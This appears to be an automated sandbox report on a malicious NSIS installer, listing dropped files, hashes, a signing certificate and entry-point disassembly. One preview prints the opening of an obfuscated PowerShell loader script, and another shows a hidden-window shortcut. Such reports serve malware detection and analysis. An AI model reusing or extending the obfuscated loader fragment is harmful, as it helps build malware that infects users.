                                                                                                                                                          Entropy (8bit):5.062687652912555
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):924744
                                                                                                                                                          Entropy (8bit):7.649692893120675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:7Xcxx2t6G/sAgiXH5DybRcnygUUDJ3l0DbiLutNS3haM78EQMZxmfemFXHW65zu+:7X22t6whH1nXrLKvE3l8Et2F2YuriV
                                                                                                                                                          MD5:C9007399358B2C71F94731C0DADA3AAE
                                                                                                                                                          SHA1:52961D38410067BE7256356AA18EE52051BEF614
                                                                                                                                                          SHA-256:A3F7477A9612F8AC90866FB2C4ADC56A447F4A8262E4AC75BB1C825A254AFBAC
                                                                                                                                                          SHA-512:67B9D38CCC08B2ACDC09DF19EBED66A945F6A6854E1E5F9B3F1A73EEF4A466ABBB13FA52519C732445D6418C388ADEC2B9EE827100FF2CAEDD0958F95061BB77
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..............................................z..........X................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc....z.......|..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26
                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):454486
                                                                                                                                                          Entropy (8bit):1.2524987371551821
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:v0ynJn+FyRFgfJzXCCuWE44ok+4FoPtBNuNi:v0ynJtFgfJW544oeWH
                                                                                                                                                          MD5:F4323CDDCA33656C45D3017DBB494458
                                                                                                                                                          SHA1:6B9284C25151843B71F790399CBAE4BD17109871
                                                                                                                                                          SHA-256:B5F229D8FCD6FE20FCED25B4714776C43CD2A7BEBDB1DEA828626A9053B0D83D
                                                                                                                                                          SHA-512:A3CC6B0945806B795724A708128F632682FF608081099CC7BFD9E6DF2C0C9BBE7D47C15178C9065BF5E24020DF0E74EE5BF3ED52BA7CE570E7D7AC30590271A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:........................!.A......v................................ ................e...........X............................Y............>..........5..O"..........................................N.....4..............t.....................................................................2..................b.........%...........q.....................[......7...............>....................................................................................O...................................<................................Z....................................#.....................................................I.........`....................................V................................,.......................................;........................................................Q........................................P.............................d=...............\..................................................8.............................,..........B........................
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):409946
                                                                                                                                                          Entropy (8bit):1.2535737381103589
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:3pKI3cbwZj87HWgWRQy56IrWKlUHAGqheijKK:738u5rCAThz
                                                                                                                                                          MD5:4FF250D172D6AA46629B269AC732435B
                                                                                                                                                          SHA1:221C813C3C21A049AAC6E1625D128153743BD0BB
                                                                                                                                                          SHA-256:F6E5E9B0245658FF93C7335D7FDD1AA4ED097FFD0D48ABCB23D07A11D49E3040
                                                                                                                                                          SHA-512:5456EA2C0FF252FC830670C5293B24D555C0728F3ECD25E3485E656176FFD039C14ACCE93402816FB96A36B19A836D2A84E9429A2D04745BDE9D011CB91189B7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.8....L...........a..E...........................T................................................W.....j...............................i...............................qB....................B........................................D.................=................................................j...................:..................................../...G..............................................................................8..................................................M........m..................................>...............>...........................................................-......................................u..............._.......7...........................=.........]....................................................................................................................................k................;..............................................p...................................~\....................m..........................P...
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):377855
                                                                                                                                                          Entropy (8bit):1.2480133053641047
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:T3j4B9Djpmub8VeOfAGor4RPrbZq9IFK9OTwdiY6d7Cl9v/sqiXIaIgIo4Vcrn/S:29P9dWwwPEofIxXG5DHJ/v/X
                                                                                                                                                          MD5:04F33F90D56994EC3DCDFC7981DC9AA0
                                                                                                                                                          SHA1:E1B39BD71B685C3EC9A0DD1F63521D019BD6A126
                                                                                                                                                          SHA-256:066EFC37F0302018EE5F4FE71649E62F64DD2310D2A8D00306A357DD0BD43C36
                                                                                                                                                          SHA-512:80263A59D97ED83826172858DD1230DAF55BDCFA3B583B29B0A2FD2349BCB8E8EC14E820A4F16D1D0BAEBE8AB243514A22CCD29C4397BF28BA5EC36D40456DBE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.............................z...................M............n..............m..................................S.....9.W.................................^........^....................~.................o..................... ......................... .............................................................................................................................................N.................i.................w....................t.............................................^........Z................=.....................................iD..............................................................6...................................................................q......................Q........k...........,........r............>...............'..+....................................................o..........J......s.................................................................................................x......N.............................................
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):494972
                                                                                                                                                          Entropy (8bit):1.2524594051710012
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:9ceAUHe6nPz1UkcBT5P7p3mq/1Ie5GkgjKjz:Rve6n4z7pRueo5K
                                                                                                                                                          MD5:539CFE2727A7650AF877C317CD317A90
                                                                                                                                                          SHA1:64F6F5F6EE89755BA75942B746529BC879817613
                                                                                                                                                          SHA-256:AE12461B71485C805DB15AAA75B5F70C957EBF40678D65CB6D3EF497F67AAFE3
                                                                                                                                                          SHA-512:5A54A7EBEEA0DDD0E0CE16ED2DB2C16C39777C663075A0C5CCF5C1D313E9F760B61DA06B330AD5CA228CA92716192B52D07D03F96ED695CD28DDFE36EB65FE85
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..............................].....................................................................................................................t~...............................'............j................<....u.................Q.......................................................................u...............(.......................................................................................................................k.................................m...8...........................................................s.................................S....6.........y.........X.....Y.......................!.......... ................................................................................................?................9.........................."......Y....................t.....................................................................J....B.............................................................s.....................................................
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):499232
                                                                                                                                                          Entropy (8bit):1.256116885413473
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:F8NKKWFbUGe3N39maaBQhaN15GaLL63n4BlYQi/SZmoN79frhS6qGSi:F8N7oUnNmN7hy3n4BlYLKLlMG5
                                                                                                                                                          MD5:C458F59BAFFABE11D1AD37909B3C7079
                                                                                                                                                          SHA1:C94C42A1AB8ABB09507280B380CAD2A920C2AE93
                                                                                                                                                          SHA-256:7073DC7C9F5942B9D5FA2D6E24CEA3D4CE6BA93176DD090EF5A5A6796BCD8DA5
                                                                                                                                                          SHA-512:34CB8B88371DE84C270CEB88B6A22F325278A9AC211E813562263E8C299DA6F76E2B205D0FDF6E7B0ED033EE10B0717F89AADA4EEC3E3D80C1B9AEC89D340F71
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:............................................................{........%......[........................................0..............................................{...B.....................;......................i.................................................#.............................s.................................................4.....8.........S.............................................................................p......................................j.....H....................n......................\.........................................................j................................>................................0...........?............................................-.....7=........................................i..............;..............................................................m..........................t...................................."............................................................................................._........
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):323948
                                                                                                                                                          Entropy (8bit):7.714465736828895
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:zCPKjt6rqobGFAJ0gj9UyoDkCcq3+VbPGZo8qIdtxpj:2Kj0LRycSyoQ6+N2qO
                                                                                                                                                          MD5:BEACF496F095426C48CDCBFB02AFF79C
                                                                                                                                                          SHA1:D26ADAA0E0E3026D14CAB7E0D4B3529452B42493
                                                                                                                                                          SHA-256:A7A907803E2932E0CA0A961E6924436E07B95AEDA2D4641A612F99AA215ED3A8
                                                                                                                                                          SHA-512:E7EC3B661A623831F6A7CD31C194CE25F0ED3BFC0BC2657A5F8A84C3C11EA0F31AF64062EF28F92A3D390A2C5193AC26B38985843749CFF2791EC811897D8D66
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.............vv........i............000...E.......nnn.........0............................n.........!................J........ffff.............9....Q......................................''''...........LLL.y.....p.u...........................U..............................yyyy.PP.......HHH.........-....................................DDD.FFF.....s...ii.K.e.......n.......\.......e.Z.............m.jj.................~~~..............%........P....s.........,,...b......x...............E.........RR.4..............|||||...........................k......5555.}}.m..T.......o................o.X.....zz.........&&..........................JJJJ.....[...++.......B..............QQ...........................MM.............................}}}}.)..................0000...............,...........c.W..................#.qq...........HH.H...#.......................................;.....DD......!!.........T..P..............mm..::........................ss....#.W..sss.\\....ff................\..........EE..
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (338), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):338
                                                                                                                                                          Entropy (8bit):4.307059828439222
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:wXW0N+ueXy8QT/DLlbCqbtidDt4jHID5GXsW/uyiNXSgP/CAjTOB+M9E+n:wXW0GXK/XlTbtq5Nt6/u3HCA2B+M9E+n
                                                                                                                                                          MD5:465F76EC7C2B514001DF749A302E6BFB
                                                                                                                                                          SHA1:F00C03E1DAC98A5F44C3920E49D73535945F5188
                                                                                                                                                          SHA-256:63B00F84026BA825D47D2185D7CD819AD9059DAC82BDBC30AD133ECB05327E7F
                                                                                                                                                          SHA-512:E72609AA7C0B54E17A0ABC784CF599ACBA2149B232880F9F25D08E2326F295DFB7607EC9CB1922B547F9495FE4ED25D4A4B1F2724D8EDA1A234F7EB2CC5235FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:jgt pensionrerne overhands hedley helmuths offensives.vgtklasses countercharged hideaways.kassandras courtiership organics ejectum gaffeltrucket,toothachy fellowlike hesiometre stripfilm kuldslaaendes,overenskomstresultaternes stitrernes konfessionen mandhaftig.communiqu fuldtidsbeskftigelsen bnkebiderne stberiers hors beached pallette,
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4023), with CRLF, LF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):73382
                                                                                                                                                          Entropy (8bit):5.152692933621261
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:DjIAqrP2YK6kbR+bWwAlb1MQvGA+tR84zL/vWAF3c9n:DDqrP2YLkMbWw6MQu5DFXvpF3In
                                                                                                                                                          MD5:D779CF7D1C17D1C3A3F3A01045E21C66
                                                                                                                                                          SHA1:62BEC72BB9CA8B42AF58DCF6D1F697C28E970632
                                                                                                                                                          SHA-256:D3EA7137AB96F1B33A042D5A46DA033D5448FA21D494A439BFF1B99D36613F5D
                                                                                                                                                          SHA-512:386658888F01D8787B4F0953156EC2086AC1D7802991BC20D6F388CA133D02E2EB59522F8201D7D7CB11FC2B93D902A78A212F68465E08709AA415E22B9B3004
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:$Perimedullarylokbogstavetnkylotia=$Kankie;.....<#Anstdelig grsganes Ondograph Overbend Predeceiving Unconvert #>..<#Cytomegalic Beadings Archmystagogue Trakkasseriets Klosetskaalenes Regangene Eireannach #>..<#Vaporium Tantiemens Flot Views Mntvaskeriers Diaphanometric Afguderiskes #>..<#Tilvejebringelsers Ordlyde Forhaan Fabriksinspektrernes Gryntelydenes Arbejdskammeraters #>..<#Disperser Delineation Criminalness Adgangskoder #>..<#amery Asylum Skgvkster #>...$Swayer = @'.Anti,ad.Diploco$SvirvleGGaranteoAnt.coxdHertugisBezilsmkLoggersrRist,ffi NonsenvUdk,ngensn,keroiSpinthenseminargRun rst=Fedning$TflenkrSPengelnhParaguao nsceptoAabningl A.ingle OutedgrMeteoro;Imprint.Non erefHestestuTumultanBalsamicFyrreaat Sag egiOdds.quoArchplunAl.arot CacatuaOWe.therv MoistueBedriftrShigellmHystadea SlutbelamplifyeKonsu.cdlunelseeFuldfre1Flonel 6 Exacer0Tr estr Slidern(T.ndfyl$SteppebP B.talieOmslagsr ndestiFerskenmAftrknieSukkerkdMetagrauPej.inglD inkerlSelvstnaPseudoirMercuriyNepotisl emune
                                                                                                                                                          Process:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):822
                                                                                                                                                          Entropy (8bit):3.353931458984559
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:8wl0ZRm/3BVkUnDypCucpANRDucLANkXg1MJ7ScEUm1bflgRNwgL6CNbw4t2YZ/e:8NU/BTDICucmDu/oMcOict2bIqy
                                                                                                                                                          MD5:149D7BDC9D71417B0B53A67436D2BC4B
                                                                                                                                                          SHA1:033E04F612537A6789ED1E7FA3329BA2701C8490
                                                                                                                                                          SHA-256:08C6B5A0A853622ED995F5D855629A43009BA25FF2633BA5A29AB9E7C1D53412
                                                                                                                                                          SHA-512:12B9004F8A67CB00B60A9EF1A1CE18DC2CDBAD5AF562996AE249D05DE9AD3D8A93A6CAB4A0FB96671CCB64E013CAF9E30C2E2B466F5418C129E89F0DC92D8A24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:L..................F........................................................I....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....t.2...........tegnskriftens.esk.T............................................t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k... .......\.F.o.n.t.s.\.t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k.P.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.p.e.l.l.a.n.t.\.s.t.i.m.u.l.e.r.e.\.C.h.e.m.o.s.i.s.\.A.m.i.d.o.a.l.d.e.h.y.d.e.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                          Entropy (8bit):7.649692893120675
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:87h216Snb7.exe
                                                                                                                                                          File size:924'744 bytes
                                                                                                                                                          MD5:c9007399358b2c71f94731c0dada3aae
                                                                                                                                                          SHA1:52961d38410067be7256356aa18ee52051bef614
                                                                                                                                                          SHA256:a3f7477a9612f8ac90866fb2c4adc56a447f4a8262e4ac75bb1c825a254afbac
                                                                                                                                                          SHA512:67b9d38ccc08b2acdc09df19ebed66a945f6a6854e1e5f9b3f1a73eef4a466abbb13fa52519c732445d6418c388adec2b9ee827100ff2caedd0958f95061bb77
                                                                                                                                                          SSDEEP:12288:7Xcxx2t6G/sAgiXH5DybRcnygUUDJ3l0DbiLutNS3haM78EQMZxmfemFXHW65zu+:7X22t6whH1nXrLKvE3l8Et2F2YuriV
                                                                                                                                                          TLSH:0B1512057B03EDB6F76743309819D4068A69EE391608B3DE7B34FBBB7A32614091F616
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....
                                                                                                                                                          Icon Hash:8ad03039793b8f46
                                                                                                                                                          Entrypoint:0x40351c
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:true
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                                                          Signature Valid:false
                                                                                                                                                          Signature Issuer:CN=Dolite, O=Dolite, L=Chattanooga, C=US
                                                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                          Error Number:-2146762487
                                                                                                                                                          Not Before, Not After
                                                                                                                                                          • 13/06/2024 04:25:27 13/06/2027 04:25:27
                                                                                                                                                          Subject Chain
                                                                                                                                                          • CN=Dolite, O=Dolite, L=Chattanooga, C=US
                                                                                                                                                          Version:3
                                                                                                                                                          Thumbprint MD5:7D138582EB2418096D8C199319C35CF7
                                                                                                                                                          Thumbprint SHA-1:F3560DACA9DD9A948F806B1FA13946EAC07D249E
                                                                                                                                                          Thumbprint SHA-256:F2677C8728BD15CB5DB2B9945757464B31B42FF6A1CABD369F29D24FEEDB26D9
                                                                                                                                                          Serial:153E2827EA78B8D05D0660B67ABB5E1BB23AA09A
                                                                                                                                                          Instruction
                                                                                                                                                          sub esp, 000003F8h
                                                                                                                                                          push ebp
                                                                                                                                                          push esi
                                                                                                                                                          push edi
                                                                                                                                                          push 00000020h
                                                                                                                                                          pop edi
                                                                                                                                                          xor ebp, ebp
                                                                                                                                                          push 00008001h
                                                                                                                                                          mov dword ptr [esp+20h], ebp
                                                                                                                                                          mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                          call dword ptr [004080A4h]
                                                                                                                                                          mov esi, dword ptr [004080A8h]
                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                          push eax
                                                                                                                                                          mov dword ptr [esp+4Ch], ebp
                                                                                                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                          mov dword ptr [esp+00000150h], ebp
                                                                                                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                          call esi
                                                                                                                                                          test eax, eax
                                                                                                                                                          jne 00007F6174BEB96Ah
                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                          mov dword ptr [esp+34h], 00000114h
                                                                                                                                                          push eax
                                                                                                                                                          call esi
                                                                                                                                                          mov ax, word ptr [esp+48h]
                                                                                                                                                          mov ecx, dword ptr [esp+62h]
                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                          neg ax
                                                                                                                                                          sbb eax, eax
                                                                                                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                          not eax
                                                                                                                                                          and eax, ecx
                                                                                                                                                          mov word ptr [esp+00000148h], ax
                                                                                                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                          jnc 00007F6174BEB938h
                                                                                                                                                          and word ptr [esp+42h], 0000h
                                                                                                                                                          mov eax, dword ptr [esp+40h]
                                                                                                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                          mov dword ptr [00429AD8h], eax
                                                                                                                                                          xor eax, eax
                                                                                                                                                          mov ah, byte ptr [esp+38h]
                                                                                                                                                          movzx eax, ax
                                                                                                                                                          or eax, ecx
                                                                                                                                                          xor ecx, ecx
                                                                                                                                                          mov ch, byte ptr [esp+00000148h]
                                                                                                                                                          movzx ecx, cx
                                                                                                                                                          shl eax, 10h
                                                                                                                                                          or eax, ecx
                                                                                                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                                          Programming Language:
                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x27ae0.rsrc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xe13580x8f0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
